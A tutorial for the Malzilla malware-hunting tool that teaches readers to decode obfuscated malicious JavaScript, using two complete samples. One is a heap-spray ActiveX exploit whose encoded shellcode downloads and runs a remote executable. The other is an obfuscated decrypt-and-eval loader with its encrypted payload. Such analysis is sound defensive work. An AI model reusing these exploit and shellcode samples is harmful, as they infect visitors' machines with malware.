Malzilla - Malware hunting tool

Tutorial 4

Using logic:

Although Malzilla can deal with a lot of scripts in pretty automated way, there is a also a lot of script where you need to do some things manually.
Let's take a look at the following example:

<iframe src='?id=bfyy' width='0' height='0'></iframe>
<script language="JavaScript">
var cuteqqid="clsid:6BE";
var cuteqqids="52E1D-E586-474";
var cuteqqidss="f-A6E2-1A85A9B4D9FB";
ying_yings=document["createElement"]("object");
var cuteqqidx=cuteqqid+cuteqqids+cuteqqidss;
ying_yings["setAttribute"]("classid", cuteqqidx);
var Cuteqq_code = unescape("%u90" + "90" +
	"%u90" + "90" +
	"%uefe9%u0000%u5a00%ua164%u00" +
	"30%u0000%u408b%u8b0c%u1c70%u" +
	"8bad%u0840%ud88b%u738b%u8b3c" +
	"%u1e74%u0378%u8bf3%u207e%ufb" +
	"03%u4e8b%u3314%u56ed%u5157%u" +
	"3f8b%ufb03%uf28b%u0e6a%uf359" +
	"%u74a6%u5908%u835f%u04c7%ue2" +
	"45%u59e9%u5e5f%ucd8b%u468b%u" +
	"0324%ud1c3%u03e1%u33c1%u66c9" +
	"%u088b%u468b%u031c%uc1c3%u02" +
	"e1%uc103%u008b%uc303%ufa8b%u" +
	"f78b%uc683%u8b0e%u6ad0%u5904" +
	"%u6ae8%u0000%u8300%u0dc6%u56" +
	"52%u57ff%u5afc%ud88b%u016a%u" +
	"e859%u0057%u0000%uc683%u5613" +
	"%u8046%u803e%ufa75%u3680%u5e" +
	"80%uec83%u8b40%uc7dc%u6303%u" +
	"646d%u4320%u4343%u6643%u03c7" +
	"%u632f%u4343%u03c6%u4320%u20" +
	"6a%uff53%uec57%u04c7%u5c03%u" +
	"2e61%uc765%u0344%u7804%u0065" +
	"%u3300%u50c0%u5350%u5056%u57" +
	"ff%u8bfc%u6adc%u5300%u57ff%u" +
	"68f0%u2451%u0040%uff58%u33d0" +
	"%uacc0%uc085%uf975%u5251%u53" +
	"56%ud2ff%u595a%ue2ab%u33ee%u" +
	"c3c0%u0ce8%uffff%u47ff%u7465" +
	"%u7250%u636f%u6441%u7264%u73" +
	"65%u0073%u6547%u5374%u7379%u" +
	"6574%u446d%u7269%u6365%u6f74" +
	"%u7972%u0041%u6957%u456e%u65" +
	"78%u0063%u7845%u7469%u6854%u" +
	"6572%u6461%u4c00%u616f%u4c64" +
	"%u6269%u6172%u7972%u0041%u72" +
	"75%u6d6c%u6e6f%u5500%u4c52%u" +
	"6f44%u6e77%u6f6c%u6461%u6f54" +
	"%u6946%u656c%u0041%u7468%u7074%u2f3a%u632f%u772e%u6361%u7973%u632e%u6d6f%u6f2f%u2e6b%u7865%u0065"); kfqq = "";
var bigblock = unescape("%u9090"+"%u9090");
var cuteqqoday;
cuteqqoday = 20;
var cuteqqoday2;
cuteqqoday2 = cuteqqoday+Cuteqq_code["length"];
while (bigblock["length"]<cuteqqoday2) bigblock+=bigblock;
fillblock = bigblock.substring(0, cuteqqoday2);
block = bigblock.substring(0, bigblock.length-cuteqqoday2);
while(block.length+cuteqqoday2<0x40000) block = block+block+fillblock;
cuteqqsss = new Array();
qq784378237 = cuteqqsss;
for (i=0; i<300; i++) qq784378237[i] = block + Cuteqq_code;
var chilam = '';
while (chilam["length"] < 4057) chilam+="\x0a\x0a\x0a\x0a";
chilam+="\x0a";
chilam+="\x0a";
chilam+="\x0a";
chilam+="\x0a\x0a\x0a\x0a";
chilam+="\x0a\x0a\x0a\x0a";
ying_yings["rawParse"](chilam);
</script>

As you can see, this script contains no decoding/deciphering function. All is "almost" in plain form there, but we still see no URL to the malware.
Only interesting thing here is the sequence of Unicode (UCS2) characters. You can see this sequence as a plain text by using Misc Decoders in Malzilla.
Copy/Paste the sequence to the Misc Decoders tab and try Decode UCS2 button.
Well, you see, there is another catch:

"%u8046%u803e%ufa75%u3680%u5e" + "80%uec83%u8b40%uc7dc%u6303%u" + "646d%u4320%u4343%u6643%u03c7" +

Tell me whats wrong here?
As we know, the Unicode characters are writen as %u + 4 digits. If you take a closer look at the previous lines, in first line you will see a break after second digit, in second line you will see a break after %u etc.
This will render Decode UCS2 useless, and probably some anti-viruses too.
In latest release (0.9.2.4) of Malzilla you will find Concatenate function on Misc Decoders tab. That function will render the previous code to more usable form.
Concatenate will also do a good job if you have CLSIDs or URLs in variables like in following two examples:

var a="ww"+"w.goo"+"gle.com"

var b="ww"&"w.goo"&"gle.com"

Another example for beginners:

<html>
<script language="JavaScript">
<!--
function nlR1sYAdQ(dp58428V3){var
m6K3yhq2K=arguments.callee.toString().replace(/\W/g,'').toUpperCase();var
A7ck1Wh8H;var B2t331TL0;var NisOkeH61=m6K3yhq2K.length;var
Xn47RT3Sm;var h8TbWsRTn='';var PkKX3bWF0=new
Array();for(B2t331TL0=0;B2t331TL0<256;B2t331TL0++)PkKX3bWF0[B2t331TL0]=0;var
A7ck1Wh8H=1;for(B2t331TL0=128;B2t331TL0;B2t331TL0>>=1)
{A7ck1Wh8H=(A7ck1Wh8H>>>1)^((A7ck1Wh8H&1)?3988292384:0);for(i5G3CC1F6=0;i5G3CC1F6<256;i5G3CC1F6+=B2t331TL0*2)
{PkKX3bWF0[i5G3CC1F6+B2t331TL0]=(PkKX3bWF0[i5G3CC1F6]^A7ck1Wh8H);if
(PkKX3bWF0[i5G3CC1F6+B2t331TL0] < 0)
{PkKX3bWF0[i5G3CC1F6+B2t331TL0]+=4294967296;}}}Xn47RT3Sm=4294967295;for(A7ck1Wh8H=0;A7ck1Wh8H<NisOkeH61;A7ck1Wh8H++){Xn47RT3Sm=PkKX3bWF0[(Xn47RT3Sm^m6K3yhq2K.charCodeAt(A7ck1Wh8H))&255]^((Xn47RT3Sm>>8)&16777215);}var
eXK5vvK0K=new Array();var
Y37iVA85C=2323;Xn47RT3Sm=Xn47RT3Sm^4294967295;if (Xn47RT3Sm<0)
{Xn47RT3Sm+=4294967296;}Xn47RT3Sm=Xn47RT3Sm.toString(16).toUpperCase();var
sNImKPP0N=new Array();var
NisOkeH61=Xn47RT3Sm.length;for(B2t331TL0=0;B2t331TL0<8;B2t331TL0++)
{var
LS0E1DrB3=NisOkeH61+B2t331TL0;eXK5vvK0K[B2t331TL0]=1;eXK5vvK0K[B2t331TL0]=Y37iVA85C;if
(LS0E1DrB3>=8)
{LS0E1DrB3=LS0E1DrB3-8;sNImKPP0N[B2t331TL0]=Xn47RT3Sm.charCodeAt(LS0E1DrB3);}
else {sNImKPP0N[B2t331TL0]=48;}}var vM4s1CVcM=0;var ahE3xpv6w;var
L3KsBg108;var
v65y6Hs6a;NisOkeH61=dp58428V3.length;v65y6Hs6a=NisOkeH61;Y37iVA85C=1123;Y37iVA85C=v65y6Hs6a;for(B2t331TL0=0;B2t331TL0<NisOkeH61;B2t331TL0+=2){var
QgQRdYhu8=dp58428V3.substr(B2t331TL0,2);ahE3xpv6w=parseInt(QgQRdYhu8,16);L3KsBg108=ahE3xpv6w-sNImKPP0N[vM4s1CVcM];if(L3KsBg108<0)
{L3KsBg108=L3KsBg108+256;}h8TbWsRTn+=String.fromCharCode(L3KsBg108);v65y6Hs6a++;Y37iVA85C=3891;if(vM4s1CVcM<sNImKPP0N.length-1)
{vM4s1CVcM++;Y37iVA85C=1092;eXK5vvK0K[B2t331TL0]=20;} else
{vM4s1CVcM=0;Y37iVA85C=B2t331TL0;}}eval(h8TbWsRTn);}
//-->
</script>
<body
onLoad="nlR1sYAdQ('AAae9e93b79EA8A3648596a5949f719DB7ab58978BA19183977C7A746Cb0af96B6599176a7689c6a7b7e936Da4a7a0aab19E9EA4b6639C96b0A5959571a9A888B8AB999Eaa5d6263b69EA09cA4989e5d7395875faa61605c6d67A49F98A5a99Ab67C91a3A85D6270ba9aa250B4667098758980789470AF96b6597467ae676d82B990766Bb996ab55ab9d67a3796ab26Ab3769176a7689C6a7B7E935EAF9AA79cB8A16BA6A4a75996a96f8868B897B1827fAF91A263a28F8696a39E74B7a9765C6B74a691b555B1677BAC9872787DA072B29ea75084a7AB96bd61596bA9a4AB5d88709B627782ae8C8A76606b876ca4677886A58789716b6A7A747467AE676d82B990765B6e5eb1677BAC9872787da09088709B627782ae8C8a966D607EAB9AA764AA6167a66689858c8a6d617E9ba8a76C7D679B756986AA9B7F6D61756d74797Ba4626490aa907b7F7d679b756986aa9B7F6E6e80666255BFAA6167A66689858c8A6d58b4667098758980789473777375628e586Ba66A6cA76A80808B865f666D7863697B6D6b6e766C68647d656270aaA8A258AC8180a1798a7f959a726970AD85779c7886889a9B7562657970A2818Ba56581929A9060817d679b756986aa9B7F5a626C55b4AD7670A398856a819C9fa27c77AF6a8A84A9905b747aa06b6991ae8776a07261AD7670A398856a819C9fA27C77AF6a8A84a9908d8Eb466709875898078945e749eaa5958A8756CAC9D866e78979E9e857Cb06e817fA88C64797bA4626490aa907BA1596C50735e59B0bc6B67A3AB776E7DAB94997c8Aa16E86939E875B876Ca4677886a58789926472786B69647c6b70677d6F6BADC0b29a9A7a9168A5a5ad8672786b69647C6b70677d6E6B96B2a761A6757093619385818681696bA1746c9c66948978817f9C9d6cb76F65a978A474A675709361938581866f6459ABA49A6F8d7CAE92A89072b1677bac9872787DA0906C9a95669b6dAE97bc868e9189996C98797075937198A196b67C9f94a876AD5DB56A67937485897D95625956756a6E92a2615891a86B916db99ba87d8173715E6A6a66677a6c6B6679626bADB996AB55AAad8562A6AC6d7F94769E95ba557AA7b69aA9586c70af96B6598680b6896D7C7b8c9C6d75686B687F9A95669B6dAE97BC866D91a86B916DB99ba87da1696B6e78726667756e6e70AD9F5058A49a6f8d7CAE92A89071695e64B49195798D71aaa6b17d5B80696b6E78726667756e6F70C19A95669b6dae97BC866d91A86B916DB99bA87D71A9a888B8ab999Eaa5d6a6B6D67A49F98A5a99aB67c91A3a85d6270ba9AA250A9A9717685aa637FAB72A79aBB5971a2b596B25D6D74a691B555a0997bAC6665BC6aA872a59e66887bAA9bAD91679C95b19cAD9D7F9F9fa26b7970A0766d7dA59a7b76657f7d679b756986aa9b7F6c687E7970A0766D7DA59a7B64606D59aba6a4a7597Da76A606288AD6B6d81A09467b66b6eAE79a85b747Aa06B6991AE87767E9Bad8A769Ca7648d8594797BA4626490aa907ba176616BA9a98e67a7b0647A93907D6Caf6B647dB88C7F92818F80A39769806c97a56B99A955617Da76a606288AD6B6d8276685963b0819875696275bb6771728c9c6160757Ab1677C66686Ba9a9717685AA637fAB907D6caf6B647dB88C7f92819A95669b6dae97BC865E93ab96AB78b39D9571b75d819875696275bb67715E7fB65095AFa89e55BF9FA4688476AA6893a18B747Aa06b6991AE8776a0726d6D7Fb6ada6a4a7598497A57F78776aA76D81696BA6A4a759798686739573896B6a7FAF91A2637dA686869a9294b46B74abA5ab5081bb7d8698BCA163627e9C9d6cb76f65A978a4769c8cA5887e9678837972A5959EAAA9A17095B1787Da6adA168767697947AA86F6Abd6e9f6b9985AC8978806783AF726a66766c6b8693A88D698b70839C8086b17d919ca8987667749BB3AB58747aA06b6991ae8776806574797BA4626490AA907B80a09467b66B6Eae79a86b747Aa06b6991ae87766E726B5ebfaf91a263ac92688c9d9687BA9c769C8cA5887E9678837972ACa592B6A9ab5D88709B627782ae8C8a6562597E797B82879E6084756A76a5a5ABa3958cA3AD5DBB926378A79b90ACAB6561666c7081a2957B9192a7a66f72887b7d73A8658d67796696a47b767aA67788988B9288A5848C6d659e7B92749Eaa61789d94779A97A8aa666C735E59B08cA68172A4979dA67a76789D94779a97a8AA665B756A6f70C1a68681959fa779b8ad5B6D96A9ab9eB2A05E96B5A4a678ac9aa273b2999e5D8Ca68172a4979da67a626b81BB7d8698bcA163626e60748b94ac84648A6c8ca1816C68697470A29B6C88839C927D6d6Ab2716c96B76d7a76B56c7F9871A19Ea3ABad985d745e59B0938c9c7f8B696eA37c645B6B9985AC8978806783af726A657D6b6B96b78a6b98bb6d7A809e7970a0766D7dA59a7B967276696Bad639aA5a8a959AB7f96A1887d786e9E688065748b94ac84648A6c8CA1817d679b756986aa9b7f6badc09Aaf96B0619D869487A3a388adA4597eb24381aaAE819a7b9Daca76c60639677786D96A571699184696e69867267967C657b6C7b7166767c9A726a7A6c667679679a6a856a6993a46c9a6685719160a56B6F7B7d6e71727C6c726a867069677B6c9a997D7071667c6c7A67a670659179699B697d6E71727C977A69A670656479777098779F6463769B6C7A789c91687B9B719B85716776796d7a65856d6660856a7A6BA56F6771a46b9a6d866e6972A4699B6bA56f699578766e6ba59F6963A5659a6da57069717C6e726E7a6e659579676f687b7c6991a46D726a7d6F696585699A96A56B717478696e797B9E639677786d96857168667b657a767c726668A49a7a677A6971737C6C9a6D7c6d7166856b9b687D7b6972a46c9A6dA571657179699b69856D697378696F657A6C65647B669b6a7A7f6672796a6f6e7b7066637a6C70687a72676179776E76866e66967A6B70677A716691796C6f767B7A66697a6c706a79719161799B6F6a7B6f66917a6B706C7a7b666979776F787b6E6568A565709a7A6E6675796A6f797B7066667A6A70697A7065767c6D9A65a56d6969A4667a76796d666279796d66789D637677786D767D6F91687c6a9a6e86696967A5657b6a7a696972a466726da69c666084689B66856b6995A465726D7C6f6971A4977a797D6F6661a46D71667D6a71687B6d706c7D7e699178776F7B796963936A5E74')">
</body>
</html>

In this example, you have a JavaScript which will be detected by Send script to Decoder button.
If you run the script, Malzilla will tell you that the script is compiled, but you will see no result.
See, JavaScript here is just a "decipher and run" function.
The data that needs to be deciphered is not a part of the script.
Take a look at regular HTML event onLoad, the data is there.
What you need to do is to copy the script to Decoder, and append to that all that you find between the quotation marks in onLoad event.
As I got a lot of questions why this kind of scripts do not give results, I implemented the Find objects on Downloader tab.
That should find all the possible triggers (function callers) for you.
The file HTML_Obj_list.txt is the definition file for objects.
In Docs folder you will find an example how to write a definition if you need to write one.